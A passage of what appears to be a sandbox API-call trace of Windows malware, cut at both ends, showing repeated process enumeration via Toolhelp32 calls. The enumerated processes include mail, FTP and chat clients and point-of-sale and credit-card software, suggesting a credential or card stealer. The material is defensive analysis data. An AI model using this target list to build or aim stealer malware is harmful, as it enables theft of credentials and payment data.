lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0226.785] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0226.787] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0226.789] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0226.791] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0226.793] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0226.795] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0226.797] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0226.799] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0226.801] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0226.803] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0226.805] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0226.807] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0226.858] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0226.859] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0226.861] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0226.862] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0226.864] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0226.865] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0226.867] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0226.868] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0226.870] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0226.871] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0226.873] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0226.874] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0226.876] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0226.877] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0226.878] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0226.880] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0226.881] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0226.883] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0226.884] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0226.885] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0226.887] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0226.888] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0226.890] Process32Next (in: hSnapshot=0x2278, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0226.891] CloseHandle (hObject=0x2278) returned 1 [0226.891] Sleep (dwMilliseconds=0x64) [0227.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xdc4 [0227.037] Process32First (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0227.038] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0227.040] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0227.041] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.043] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0227.044] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0227.045] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0227.047] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0227.048] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0227.050] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.051] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.053] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0227.054] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.055] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.057] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.058] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.060] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.061] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.063] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.064] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0227.065] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0227.067] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0227.068] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.070] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0227.071] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0227.093] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0227.095] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0227.096] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0227.097] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0227.099] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0227.101] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0227.102] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0227.104] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0227.106] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0227.108] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0227.109] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0227.110] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0227.112] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0227.113] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0227.115] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0227.116] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0227.118] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0227.119] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0227.120] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0227.122] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0227.123] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0227.125] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0227.126] Process32Next (in: hSnapshot=0xdc4, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 